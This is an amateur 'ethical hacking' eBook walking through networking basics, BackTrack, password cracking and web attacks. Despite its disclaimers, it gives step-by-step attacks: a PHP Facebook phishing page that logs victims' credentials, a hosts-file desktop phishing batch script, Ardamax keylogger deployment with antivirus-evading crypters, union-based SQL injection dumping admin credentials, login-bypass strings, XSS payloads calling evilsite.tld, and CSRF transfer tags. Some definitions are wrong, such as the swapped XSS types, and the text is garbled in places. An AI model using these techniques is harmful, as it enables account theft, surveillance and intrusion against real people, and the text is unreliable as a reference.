root@localhost:~#
root@localhost:~#
“what they keep secret we expose”
By
Copyright Notice
Any unauthorized use, distributing,
reproducing is strictly prohibited.
Without the permission of its
author.
Liability Disclaimer
The information provided in this
eBook is to be used for educational
purposes only. The eBook creator is
in no way responsible for any
misuse of the information provided.
All of the information in this eBook
is meant to help the reader develop
a hacker defence attitude in order
to prevent the attacks discussed. In
no way should you use the
information to cause any kind of
damage directly or indirectly. The
word “Hack” or “Hacking” in this
eBook should be regarded as
“Ethical Hack” or “Ethical hacking”
respectively.
You implement the information
given at your own risk.
Contents
Contents...3
Introduction...6
What is ethical hacking...6
Who is a hacker...6
Types of hackers ...6
Who can use this book...7
NETWORKING...7
a)Concept of networking...7
b)Basics about TCP & UDP...8
Programming...9
Do I really need it?...9
Where should I start?...9
Backtrack...10
What is it?...11
2.Installing & Running Backtrack ...12
1)Clean Hard drive install...12
2)Dualboot Installation...17
3)USB installation...18
Basic Linux Commands...19
Password Cracking...20
1)Brute Force... 20
2) Dictionary Based attack...21
3)Rainbow tables...21
Rainbow tables are a large database of pre computed ciphers with their actual plaintext from which they were calculated. Rainbow table generator are the tools which takes all possible combination of legal characters & calculate their hash using your desired algorithm & store them in a large database. Common Cryptographic algorithm used in CMS’s are...21
Phishing...24
1)Demo (How crackers hack your facebook account using phishing)...24
Desktop phishing...28
Social Engineering...29
Keylogging...30
Demo: How to hack using Ardamax Keylogger...31
RAT (Remote Access Trojen)...34
Malware...35
Web Hacking...35
Footprinting...35 Port Scanning...39 SqlInjection...41 Authentication Bypass...50 XSS...51 CSRF...53 Buffer Overflow...54 RFI...57LFI... 58 Open Redirection...61
Introduction
What is ethical hacking
Ethical Hacking is the process of finding
vulnerabilities in a computer system by using
programming or non programming skills (just like rooting an apple device without any software) & then exploiting these vulnerabilities.
Who is a hacker
A hacker is someone who uses his computer knowledge to find vulnerabilities in computer
systems & then exploit it for any reason including Patriotism, malicious purpose, or some personal problems with the owner of that system.
Types of hackers
There are basically three types of hackers:-1-: Grey Hat
They are the combination of both Black Hat & White Hat hackers. They Sometime work as defensive & sometime offensive.
2:-White Hat
Their sole purpose is to test websites individualy or for a company & report them about their
vulnerabilities. 3:-Black Hat
They break system security for malicious purposes including identity theft, credit card theft,
destruction of data etc,.
Other Than these there are also some other
types:-1. Elite Hackers
They are highly skilled hackers they are good programmers as well. They create new exploits & also help in cyber security awareness.
2. Script Kiddies
They are non-expert they usually hack using programmes created by others but they are a rank higher than Neophyte.
3. Neophyte
These are the newbies or n00bs who don’t know anything about hacking & other techniques.
4. Blue Hat
A person outside some security company or a firm who test security or bug vulnerabilities of their apps.
5. Hacktivists
A hacktivist is a hacker who breaks into a system to announce a social, political or religious
message.
Who can use this book
Anybody who is interested in cyber security
including Students, administrators, webmasters, analysts, engineers blah blah in fact everybody who is connected to internet can use its content to get some awareness about latest cyber attacks.
NETWORKING
a) Concept of networking
Networking is the process of connecting two or more computers in order to communicate & share resources such as printers,data etc.
a)LAN
A Local Area Network (LAN) is a network that is confined to a relatively small area. It is generally
limited to a geographic area such as a writing lab, school, or building.
b)WAN
Wide Area Networks (WANs) connect networks in larger geographic areas, such as Kashmir, the Palestine, or the world. Dedicated transoceanic cabling or satellite uplinks may be used to connect this type of global network.
c)MAN
A Wide Area Network or WAN is a type of networking where a number of resources are installed across a large area such as multinational business. Through WAN offices in different countries can be
interconnected. The best example of a WAN could be the Internet that is the largest network in the world. In WAN computer systems on different sites can be linked d)Peer to Peer(P2P)
A peer-to-peer (abbreviated to P2P) computer
network is one in which each computer in the network can act as a client or server for the other computers in the network, allowing shared access to various
resources such as files, peripherals, and sensors without the need for a central server.
b) Basics about TCP & UDP
Transmission Control Protocol User Datagram Protocol It is a connection oriented
protocol It is a connection less protocol Message delivery is
guaranteed Message delivery isn’t guaranteed Data arrives in order There is no order in data
arriving Packets are sent as
Stream Packets are sent individually There is retransmission of
packets There is no retransmission of packets It is Slow because of
extensive error checking which make it slow
It allows only basic error checking making it faster than TCP but less robust E.g. include HTTP, SMTP,
Programming
Do I really need it?
To Become a good hacker you should possess a good
programming skills. Its the only way you will create your own exploits & tools which will help you a lot in your way to become a good hacker.
“Eat, Drink & code, Or your system will overload” – Microsoft*(Hack Marathon)
Where should I start?
The most important question every newbie asks, the easiest way is to start reading books, clear the basics then go into advance & the important thing take references from the programmers.
Type Description E.g
Compiled Those which are processed by a compiler
C,C+
+,C#,VisualBasic,Vis ual Fox Pro etc
Multiparadigm They allow a program to use more than
one programming style
PHP,Python,Perl etc
1) Always take languages which are easy to understand. 2) Try to make your own programs as soon as possible.
3) Look at your code & try to understand every example, how & what do these codes do, why we need them & blah blah
4) Learn how to use a debugger.
5) If you are not able to understand clear your ideas from various online forums like Stack overflow.
6) All languages are almost same the only difference is that the syntax changes, that’s why take only that language which you think you can understand, so that it will be easy for you to understand other languages too.
7) Keep Coding, Coding & Coding
What is it?
BackTrack is a distribution based on the Debian GNU/Linux distribution aimed at digital forensics and penetration
testing use.The current version is BackTrack 5 R3. It consists many tools.BackTrack arranges tools into 12 categories:
Information gathering Vulnerability assessment Exploitation tools Privilege escalation Maintaining access Reverse engineering RFID tools Stress testing Forensics Reporting tools Services Miscellaneous
Some of the well known security tools which it includes Metasploit
for integration
RFMON, injection capable wireless drivers Aircrack-ng Kismet Nmap Ophcrack Ettercap
Wireshark (formerly known as Ethereal)
2.Installing & Running Backtrack
There are 4 ways by which you can install backtrack, depending on you
i.Clean Hard drive install: whole drive is used for backtrack ii.Dual Boot Installation:Your system already have a windows o/s which is taking up all the space in your hard drive, now you are resizing or partitioning your drive to install dual o/s i.e
window + Backtrack
iii.USB installation: Installing backtrack either clean hard drive or dual boot with a USB drive instead of a DVD
1) Clean Hard drive install
Boot BackTrack on the machine to be installed. Once booted, type in “startx” to get to the KDE graphical interface.
Double click the “install.sh” script on the desktop, or run the command “ubiquity” in console.
Select your geographical location and click “forward”. Same for the Keyboard layout
The next screen allows you to configure the partitioning
layout. The assumption is that we are deleting the whole drive and installing BackTrack on it.
Accept the installation summary and client “Install”. Allow the installation to run & complete.
Restart when done
Log into BackTrack with the default username and password root / toor. Change root password.
Fix the framebuffer splash by typing “fix-splash” ( or “fix-splash800″ if you wish a 800×600 framebuffer), reboot.
2) Dualboot Installation
Boot BackTrack on the machine to be installed. Once booted, type in “startx” to get to the KDE graphical interface.
Double click the “install.sh” script on the desktop, or run the command “ubiquity” in console.
Select your geographical location and click “forward”. Same for the Keyboard layout.
The next screen allows you to configure the partitioning layout. The assumption is that we are resizing the
Windows 7 partition and installing BackTrack on the newly made space.
Grub should allow you to boot both into BackTrack and Windows.
Log into BackTrack with the default username and password root / toor. Change root password.
Fix the framebuffer splash by typing “fix-splash” ( or “fix-splash800″ if you wish a 800×600 framebuffer), reboot.
Accept the installation summary and client “Install”. Allow the installation to run and complete. Restart when done.
3) USB installation
Plug in your USB Drive (Minimum USB Drive capacity 2 GB)
Format the USB drive to FAT32 Download Unetbootin
from http://unetbootin.sourceforge.net/
Start Unetbootin and select diskimage (use your backtrack ISO)
Select your USB drive and click “OK” for creating a bootable BackTrack USB drive
Log into BackTrack with the default username and password root / toor.
Basic Linux Commands
Startx:To start GUI in backtrack Halt:Shudown
Sleep:sleep Reboot:Restart
Cd:change directory Ls –la: Listing directory
Mv $folder $newfolder:Change the name of a directory Pwd: Print working directory
Find / love: Find file named love in rot directory Rm –r:Remove an existing directory
Cp:copy files
Killall program:Kill all Processes Ps aux:show running process Ifconfig:Ipconfig
Gcc in_file –o out_file: For compiling c files Sudo:To give super user rights
Ping host:Sends an echo request via TCP/Ip to a specified host
Id:To which user you are logged in cat /etc/passwd:To show account list uname –r:Show released info
uname –a:Show kernel version
dpkg -l:To get list of all the installed programs last -30: Show’s log’s of last 30 ip’s
useradd: To add user account usermod: To modify useraccount w:show logged users
locate password.txt:Show location of password.txt in current directory
rm –rf/: To remove all
chmod ### $folder: change permission of a folder lsmod:Dump kernel modules
For the beginners there are a lot of websites which teach linux for free check it out this on
http://www.beginlinux.org/ or just google it
Password Hacking
The Process of stealing password or credentials from the legitimate user is called password hacking. There are many ways by which we can get the password of device, email, router, account blah blah.
Password Cracking
The process by which we get a password by giving a range of characters or predefined words is called password cracking. Password can be cracked by the following
ways:-a) Brute force Attack
b) Dictionary Based attack c) Rainbow tables
1) Brute Force
Brute Force is a technique used by a application
program to decode any encrypted data (encoded using an algorithm). What a Brute Force program actually do is, it take all possible combination of legal characters i.e. Alphabets (both uppercase & lowercase), Numbers, & Symbols & proceeds with them. If the password
length is 4 & contains only alphabets in lowercase & no special character or number therefore it will starts brute force like this
“a”,“aa”,“aaa”,“aaaa”,”aaab”,aaac” blah blah. These programs can attempt many strings per minute. For a strong encrypted data (consisting Alphabets both
i.e. Symbols) can take many days to get decrypted. These programs can overcome any encrypted data (password/hash). Some of the Commonly Used Programs Are
Cain & Abel, Brutus, John The Ripper etc. Backtrack contains many brute force tools.
2) Dictionary Based attack
In this technique a program uses an English Dictionary to decrypt an encrypted cipher. In this type a program uses all possible legal words contained in a dictionary to decrypt a password/hash known as cipher. Cain & Abel, Brutus, John The Ripper are some of the tools used to launch a dictionary based attack.
3) Rainbow tables
Rainbow tables are a large database of pre computed ciphers with their actual plaintext from which they were
calculated. Rainbow table generator are the tools which takes all possible combination of legal characters &
calculate their hash using your desired algorithm & store them in a large database. Common Cryptographic
Cryptographic
Hash Length Note
MD5 128 bits 32 char
Hexadecimal
MD5 Salted 128 bits : Any
Length Contains two blocks
32 char
Hex:Random
SHA1 160 bits 40 char
Hexadecimal
SHA256 256 bits 64 Char
Hexadecimal
MySql 5 164 bits 41 char
All Char Capital Starts with Asterik * MD5 (wordpress) 136 bits 34 Char Starts with $P$
Variable case alpha numeric
MD5
(phpBB3) 136 bits 34 CharStarts with $H$
Phishing
The most common way to acquire personal information such as username, password, email id, credit card info, etc. If you too lazy to inspect some basic info just like seeing your url while clicking on any link, then you will soon lose access to your account’s. Here is a demo how to hack into any account using phishing.
1) Demo (How crackers hack your facebook account using phishing)
1. Go to facebook.com
2. Right click anywhere on the page & click on view page source
3. Copy all source code into notepad or any editor.
Change “action=https://www.facebook.com/login.php? login_attempt=1”
to “action=next.php” & method=”post” to method=”get” & save whole page to anything say hello.php
5. Now open a new page in notepad & write the following code into it
<?php
header("Location: https://login.facebook.com/login.php"); $handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
& save as next.php in the same directory
I will not go into deep what these pieces of lines do.
6. Now again open a new page in Notepad & save as passes.txt (Keep the page blank)
7. Create a hosting account at any free hosting website say bytehost & get your domain say XXXXXX.bytehost.com. 8. Now open your dashboard & click on filemanager.
Under file manager click on public_html
9. Upload all three files to the public_html folder. 10. Now your Urls will be like this
XXXXXX.bytehost.com/index.php XXXXXX.bytehost.com/next.php XXXXXX.bytehost.com/passes.txt
11. Give your url XXXXXX.bytehost.com/index.php to your victim & try to convince him to login with his credentials. (I am kidding dnt try to pwn any one, it’s only for educational purpose)
In image I logged in with username=aa & password=aa
12. When anybody login to that website with his email id & password, the credentials will be saved at
XXXXXX.bytehost.com/passes.txt & he will be redirected to real facebook login page.
Whoo you have got the credentials of your victim.
This tutorial is only for educational purpose, & will make you aware about how hackers hack into your profiles by
phishing.
How to Prevent yourself from being a victim of phishing
The best way to prevent phishing is that you Always double check (if your eye site is weak :P lol) the url of facebook website & always use secure connection “https://” instead of “http://” i.e
https://www.facebook.com. Hackers always use domain names similar to facebook like facebok,facebuk,face-bok blah blah
Desktop phishing
Host file is a system file used by the operating system to map hostname to their ip addresses. It is %windir
%\System32\drivers\etc. Things you need
1. Static ip or you can use a vpn which assign you a static ip like Strong Open VPN Download It Here
2. A webserver wamp or xampp
3. Facebook phisher (Already built in simple phishing above this tutorial)
4. Desktop phishing script 5. & Binder google them. Install Wamp & VPN
Now copy phishing files i.e (hello.html, next.php, & passes.txt) to the root
directory of your webserver for wamp it is %installation directory/wamp/www
Now open Notepad & enter this Desktop phishing script
Replace 0.1.2.3 in Desktop phishing script with the ip address you got from the vpn, to check ip address goto http://cmyip.com & save file as anything.bat
This file could look like suspicious to the persom you are sending through email or by data transfer medium. So we will bind it with another file using binder’s Google them you will find loads of binders out there.
After the victim executes your .bat file his host file adds some thing like this
& whenever he enter www.facebook .com he will be redirected to you ip address hosting phisher.
Social Engineering
Its one of the biggest threat to our privacy. It’s an act by which an attacker manipulates with the mind of people so that they can give their confidential information to the attacker. They usually trick people by reading their body language. Biggest scam’s like fake lottery, money transfer etc are the result of social engineering. It plays a vital role in any type of phishing. It is the biggest threat to the
companies. They (attacker) usually trick employees of the company resulting in the theft of financial
information/confidential information. An attacker usually call or email people tell them he is from the customer
care/support & ask them some personal question’s like their Name, D.O.B, Residence, email id, Password & usually most of the people give their personal information including their
password thinking that they are getting that call/email from a legitimate source. After collecting some information they get access to your secret information/accounts. And Bang! Victim gets Social Engineered.
Keylogging
Keylogging is the method of tracking the keys struck on keyboard. It can be done by two ways either using
Software Keylogger or Hardware Keylogger. Both these keylogger’s store the keys struck on the keyboard in the memory in the form of logs. Later these logs can be send to the email id, or the ftp of the attack.
Software Keylogger: They usually consist of two files i.e. “.dll” & “.exe” file. The .exe file executes the dll file & makes the keylogger work. They are binded & encrypted, making an anti-virus hard to find any evidence. They usually work in stealth mode making victim even more hard to find them. They have many features
like:-1. They work in stealth mode. 2. They capture screenshots.
3. They consist remotely deploy wizard. 4. Registry entries are hidden.
5. Website visited tracks. 6. Application used tracks.
7. Capture HTTP Post operation.
8. Capture video of victim using webcam.
9. Record sound of surrounding using a microphone connected.
10. They can be exported using txt or html. 11. User friendly interface.
12. Can track your location.
13. Automatic delivery of logs after interval set by attacker.
14. Capture chat logs.
Demo: How to hack using Ardamax Keylogger.
1. Buy ardamax Keylogger from their site or just Google it if you don’t want to spend money. You will get a pro version
with remote deployment wizard.Install the setup. Now register your
2. After registering click on remote Installation
3. Click Next until you Security dialog, Click on enable & set password. After that click on Next. Now you will get
Options dialog here set your magic keys.Click next. Now Comes the first part of Control section Select the method & time interval through which you want to receive the logs as shown in image “4”.Click next. Now comes the heart of this tutorial if you make some mistakes here your
keylogger will not work enter the details as shown in image “5”. Click next. After clicking next you will get another Control dialog as shown in image “6”.Keep your desired settings here. & click next.
4. Keep clicking next until you get destination dialog Select your path, change icon & click next until the wizard gets completed & you will get a success build message.
5. After building you need to crypt it so that it will not get detected by anti virus. Download any good FUD(Fully UnDetectable) Crypter(google it), which will crypt your keylogger & Now can bypass anti virus.
Note: This file will get detected by most of the anti virus, so keep your anti virus disabled until you make your keylogger.
6. Now share your keylogger through your Social engineering talent :P :D
RAT (Remote Access Trojen)
Its is a type of trojen which is used to control over the victims machine. Once installed it can do whatever an attacker wish, can create files, folders, open cd-drive, play popup, use you files, upload & download files on you
machine. After installing on your machine an attacker can do all these things
remotely:-1. Create, Open & delete Files & Folders. 2. Format complete hard disk
3. Install malicious programs.
4. Overload your memory RAM or ROM
5. Can use your system for malicious purposes like DDOS 6. Hide files, & folders
7. Control your peripherals & start or kill your processes. 8. Record music & video
9. Steal passwords
10. Print rich contents & view your screen. Some of the commonly used RAT are Cybergate, Darkcomet,LAN filtrator, Spy-Net.
Malware
Malware is a piece of script which is used to destroy/disable computers, gather sensitive data, gain access to private networks, create backdoors or to interrupt a private
computer network. They include worm, Trojans, adwares, spywares, rootkits & viruses. In short when we combine all type of computer threats then they are known as Malware. It is usually used to spy on foreign networks, government
organizations, or corporate sectors. It can be either a piece of script, software or active contents. They usually copy itself from one network to another using removable disks. They are distributed through social networking sites, file sharing websites, or infected websites. Once the file is installed on your device it then connect to internet & download other modules of it.
Web Hacking
Website hacking is the process of penetrating into a web
application by exploiting a vulnerability in it. Below are some of the techniques used by attackers
Footprinting
This is the first step of ethical hacking. Before a pen tester goes into deep, the most important thing is to gather some
information about the machine. It includes checking open ports, whois, nslookup etc
a) Open Ports:- Firstly we need to know what are Networking Ports? A port is a specific software either application or process, acting as a end point of a computer’s host
operating system. E.g. Port 80=HTTP, 21=FTP, 443=SSL . To find the Open Port in A End User system we have many tools available, Most widely tool is Nmap which help us to detect ports on a remote system. Also there are many online websites which help you find the open ports on a
remote system like yougetsignal, canyouseeme, t1shopper etc
b)Banner Grabbing: After finding the open ports now comes the Banner Grabbing. It is the technique by which a
attacker can get some really important information about the services running on the remote system like operating system, service application version, developer etc. You Can get information using telnet simply. Open command
prompt & enter as shown in image. Replace google.com with your website
After enter these information you will get some information like this
After getting the banner information an attacker finds the exploit for the services running on that remote host.
Commonly used exploit database’s are exploit-db, 1337day, metasploit, security vulns
c) Other than these methods an attacker can use various other techniques to dig up information from the various online sources like whois, it is the method by which an attacker can get information about the domain name registering organization or individual like his name, address, email etc. Commonly used websites for finding who is are whois.net, whois.com, who.is, network solutions d)Nslookup: It is the technique to get information about
name servers of a domain & map dns records. It comes pre installed with windows o/s. To get information about a domain follow these steps:
Or you can use online services to find nslookup like Network-tools
e) Tracert: It is another important tool, it allows an attacker to find the route & delay time to the remote host. Using simple command “tracert<space>yoururl.ext” e.g., tracert yahoo.com
Port Scanning
Port scanning is one of the important aspect of ethical hacking. We can scan ports both with/without using a
software. One of the best tool used for scan ports is Nmap. For windows Download GUI of Nmap called Zenmap from their official website
For linux users, open terminal & type “sudo apt-get install nmap” (without quotes)
It comes preloaded with backtrack linux. For
windows:-After Installing open zenmap.exe GUI of nmap will open in front of you
Enter the url in the url field & choose your profile depending upon your needs.
Since these tools left a bunch of traces including your Ip address it can sometimes create a problem for the person scanning a remote host. Therefore it is better to use an alternative, & mostly people prefer to do all the things using website without installing such software’s on their machine. Here i have got an alternative ScanPlanner it is a website which detect many useful thing on a remote host including ports, O/S, Remote Services/Versions. Goto ScanPlanner, Enter your url in the input box & select the appropriate check boxes. & click in Run Scan
Besides scanplanner there is another site known as yougetsignal which allows us to find many useful
information about a website including ports, reverse ip, network location etc
SqlInjection
Before Sql Injection we have to know about Sql. Sql or Structured Query Language as the name implies is a programming language responsible for the updating, deleting & requesting information from the database management systems. Sql injection is a flaw in a
application which exploits a bug that can allow attacker to get sensitive information from the database. It is one of the deadliest hacking technique by attackers which is caused by the vulnerability when the user input is not filtered properly, the user input is allowed to execute as a sql statement in the database of the application. The
attacker inserts a sql command (query) into the entry form or any input field which gets executed in the database application enabling attacker to manipulate database. A successful sql injection can enable attacker to read the data from database or write data into the database.
• User input is directly sent to database interpreter as a sql query without filtering the input.
• Attacker tricks interpreter by using various special sql queries.
• By using sql queries an attacker can do whatever an attacker wants to do e.g delete, read, write, update data etc
• With the sql injection vulnerability an attacker can deface the website.
• Upload malicious files thus can get access to whole server & can execute remote codes on host operating system.
Demo:-String SQLQuery ="SELECT Username, Password From users where username='" + txtUsername.text + "' AND Password='" + txtPassword.text + "'";
If an attackers inserts ' or '1'='1 as username & password the query will become
as
String SQLQuery ="SELECT Username, Password From users where username=' or '1'='1 AND Password=' or '1'='1
“'";
As we know one is always equal to one, thus it will login an attacker as a user, and return data from the database
allowing an unauthorised user to view sensitive data. Later an attacker can edit, update, or delete from the database.
Testing SQL injection
vulnerability
The easiest way is to use an single quote (‘) after the variable of an parameter.
http://vulnerablesite.tld/index.php?
id=test
’
If you get some error like “ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line “” , or if you notice something went missing from page like picture, text etc or the webpage is taking a long time to open after adding the single quote. Then that website is vulnerable. Or sometimes you will get more generic response from server like HTTP Server status Code 500, that means sql statement is invalid.
Manual Sql Injection Demo
(
From Xedlgubaid.blogspot.com)
1). Check for vulnerability
Let's say that we have some site like this http://www.site.com/news.php?id=5
Now to test if it is vulnerable add quote ' (quote), and that would be
http://www.site.com/news.php?id=5' so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar as discussed above in Testing Sql injection vulnerability
2). Find the number of columns
To find number of columns we use statement
until we get an error. http://www.site.com/news.php?id=5 order by 1/* <-- no error http://www.site.com/news.php?id=5 order by 2/* <-- no error http://www.site.com/news.php?id=5 order by 3/* <-- no error http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)
that means that the it has 3 columns, cause we got an error on 4.
3). Check for UNION function
With union we can select more data in one sql statement. so we have
http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works
4). Check for MySQL version
http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some
error, then try
--it's a comment and --it's important for our query to work properly.
let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or
version() and get someting like 4.1.33-log or 5.0.45 or similar.
It should look like this
http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
then we have to use convert() function
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
Or with hex() and unhex()
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get MySQL version 5). Getting table and column name
Well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL >
5 version.we must guess table and column name in most cases.common table names are: user/s,
admin/s, member/s ...common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e would be
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good )
we know that table admin exists... now to check column names.
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error,
then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc...
now to check if column password exists
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error,
then try the other column name)
we seen password on the screen in hash or plain-text, it depends of how the database is set up i.e md5 hash, mysql hash, sha1...
now we must complete query to look nice for that we can use concat() function (it joins strings)
i.e
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/* Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)
(there is another way for that, char(58), ascii value for : )
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from
admin/*
screen, i.e admin:admin or admin:encrypted hash when you have username & password, you can login like admin or some superuser.
6). MySQL 5
Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.
For this we need information_schema. It holds all tables and columns in database.
to get tables we use table_name and information_schema.tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/* here we replace the our number 2 with table_name to get the first table from
information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
note that i put 0,1 (get 1 result starting from the 0th)
to limit 1,1 i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
the second table is displayed. for third table we put limit 2,1 i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...
To get the column names the method is the same. here we use column_name and
information_schema.columns
the method is same as above so example would be
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from
information_schema.columns limit 0,1/* the first column is diplayed.
the second one (we change limit 0,1 to limit 1,1) ie.
1,column_name,3 from
information_schema.columns limit 1,1/* the second column is displayed, so keep incrementing until you get something like
username,user,login, password, pass, passwd etc... if you wanna display column names for specific table use this query. (where clause)
let's say that we found table users. i.e
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from
information_schema.columns where table_name='users'/*
now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won't work if the magic quotes is ON. let's say that we found colums user, pass and email. now to complete query to put them all together
for that we use concat() , i decribe it earlier. i.e
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/* what we get here is userass:email from table users. example: admin:hash:[email protected]
After getting all the credentials you can login to Admin Panel, commonly Admin Panels are located at
/login.ext (where ext will be the platform on which website is made like php,asp etc)
/admin.ext /adminlogin.ext
Or you can use google dorks or find it online using online admin panel scanner like
http://scan.subhashdasyam.com/admin-panel-finder.php
Authentication Bypass
As the name implies it is a flaw in badly coded webapps which allow direct access to backend of a webapp without any use of valid credential. By inputting some malicious strings we can get access to the backend. Here are some special strings, ’or’’=’ ‘or’’1=1-- admin'--admin' or '1'='1--admin' or '1'='1'--admin'or 1=1 or ''=' admin' or 1=1--admin') or (admin') or '1'='1--Lets take a form which takes username & password
SELECT * FROM Users WHERE Username=’$User’ AND Password='$Pass’
Let user= & pass=
SELECT * FROM Users WHERE User='1'='1’-- AND
Pass='1'='1’--Since we know 1 is always equal to 1 it will get executed & authenticate the user without knowing for the actual username & password. -- means
comment it tells the database that not to execute the remainder. Thus anything after the -- will be neglected & will not be executed.
XSS
XSS or Cross site scripting is one of the biggest security flaw in web application which allow an attacker to steal cookies, redirect to malicious pages etc. This
vulnerability has affected all type of websites from Google to Facebook. It is a type of vulnerability which allows an attacker to inject malicious codes into the web apps. While talking of xss we think of JavaScript, but it’s not only JavaScript’s it can be any HTML, XML as well as JavaScript. It is caused by poor coding, when a
developers don’t filter special symbols like “>””,””/” an attacker can take advantage of it. Malicious Strings can be inserted to the page through tampering URL, Search field, input fields, comment boxes etc. A common XSS script looks like this;
<script>alert(“root@localhost:~#”)</script>
Xss is of three types
a) Persistent b)Non-Persistent c)Dom based
a) Persistent: As the name indicates it is a kind of xss which works for temporary time, it is commonly executed through HTTP query or form submission. It is also called reflected xss.
A persistent xss could look like this
http://vulnerablesite.tld/index.php? parameter=<script>alert(“XSS”)</script>
b)Non-Persistent: It is kind of xss in which the malicious script is Stored in the webapp
permanently so whenever a user try to view the page script gets executed. Common e.g. will be a comment box, when an attacker inserts some malicious script into the comment field it will get saved into the webapp permanently. If that
comment box doesn’t sanitize requests the scripts will gets executed every time a user visits that
page containing that comment box. It is also Called Stored XSS.
A Non-Persistent xss could look like this <script
src=http://evilsite.tld/maliciouspage.js></script> c) Dom based: It is also called type-0 xss, it is
occurred by modifying DOM environment of a browser. Client side is responsible for this attack while as in reflected & stored server side code is responsible. Server side request doesn’t change while as code for the client side run in a different manner.
Many sites are vulnerable but doesn’t execute code because developers filter special symbols, but
these filters can be bypassed by encoding them using various techniques like Hex, Char Code, ASCII etc.
After encoding the malicious code look like this Source String: <script>alert("XSS")</script> URL: %3C%73%63%72%69%70%74%3E%61%6C %65%72%74%28%22%58%53%53%22%29%3C%2F %73%63%72%69%70%74%3E
HTML Value (with semicolons):
<script>& #x61;lert("X&# x53;S")</sc 2;ipt>
HTML Value (without semicolons):
<script>a
 8ert("XSS") </script>
Base64:
PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4= Demo Xss Using a xml file:
<root xmlns="http://non.existe.ent/namespace"> <script xmlns="http://www.w3.org/2000/svg"><![CDATA[ document.location="http://evilsite.com"; ]]></script> </root> Impact of XSS:
Remotely Control Browser. Spread Worms, Malware etc. Redirect to malicious pages.
Steal Cookies thus can Hijack accounts Can Exploit browser.
CSRF or Cross Site Request Forgery is one of the dangerous vulnerability in webapps. In CSRF a victim is forced to execute some HTTP request in order to do some actions. The only need is that victim must be logged in at that time & a little bit Social Engineering. It is very easy to exploit a csrf vulnerability & can have a very critical impact. It is commonly executed using image tag or an iframe. Demo of CSRf
<img src="http://anonymousbank.com/transfer? account=John&amount=9999999999&recipient=Ahmad">
<iframe src="http://anonymousbank.com/transfer? account=John&amount=9999999999&recipient=Ahmad"></iframe>
As you can see above when these piece of code’s are embedded in a webpage & John is forced to open that page, it will transfer 9999999999 from the account of John to Ahmad.
Buffer Overflow
Here comes the real part Buffer overflow is the vulnerability when a program tries to write more data in buffer memory than it is capable of thus making it to write in adjacent memories thus over writing the data stored in those adjacent memories. The extra data can contain some malicious code which can trigger some malicious action. By buffer overflow an attacker can get partial or full control over victim’s machine. Later he can add some
backdoors on the victim’s machine for further
action & can use victim’s system as a bot. It is one of the deadliest attack. Exploitation vary from heap based memory & stack.
Buffer overflow demo Thanks to Passwdatt
/*
This program is a good example of buffer overflow attack that corrupts data (password) without modifying the address of the variable that stores it. The program accepts user name as input and loads the stored encrypted password into a buffer. When the user enters a password that is longer than 8 characters, it overwrittes the system password. Thus creating a window of opportunity for a hacker to break into the system.
The valid usernames and passwords can be found in the init_list function. The program uses Caeser Cipher where the shift is 3.
For example a,b,c will be d,e,f.. so on and x,y,z will be a,b,c. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <conio.h> #include <cstdlib>
// defines how long the username/password should be. For a unix system, the length is 8. #define MAXLENGTH 8
// increase this if more users are added to this system. #define LISTLENGTH 5
/*
Structure used to store the list of user names
and their corresponding passwords. More names can be added by increasing the array length.
*/ struct usrlst { char *unames[10]; char *passwd[10]; }; //Function prototypes
void init_list(struct usrlst *u);
int get_indx(char *pch, struct usrlst *u); void encode_passwd(const char *, char *); /*
The main program. */
int main (void) {
struct usrlst usr; int i=0, pass_indx=-2; char ch_tmp='\0';
// keep the length of the string one greater than the MAXLENGTH to accomodate the '\0' character at the end.
char buffer[4][MAXLENGTH+1];
char *usrname, *usrpasswd, *sys_enc_pass, *usr_enc_pass; usrname = buffer[0];
usrpasswd = buffer[1]; sys_enc_pass = buffer[2]; usr_enc_pass = buffer[3];
//printf("<%p>,<%p>,<%p>,<%p>\n",&usrname[0],&usrpasswd[0],&sys_enc_pass[0],&usr_enc_pass[0]); printf("Password table is shown as below:\n");
printf("Username \t\t Password \t Encrypted Password\n"); printf(" joe \t\t\t ilovemsu \t\t loryhpvx\n");
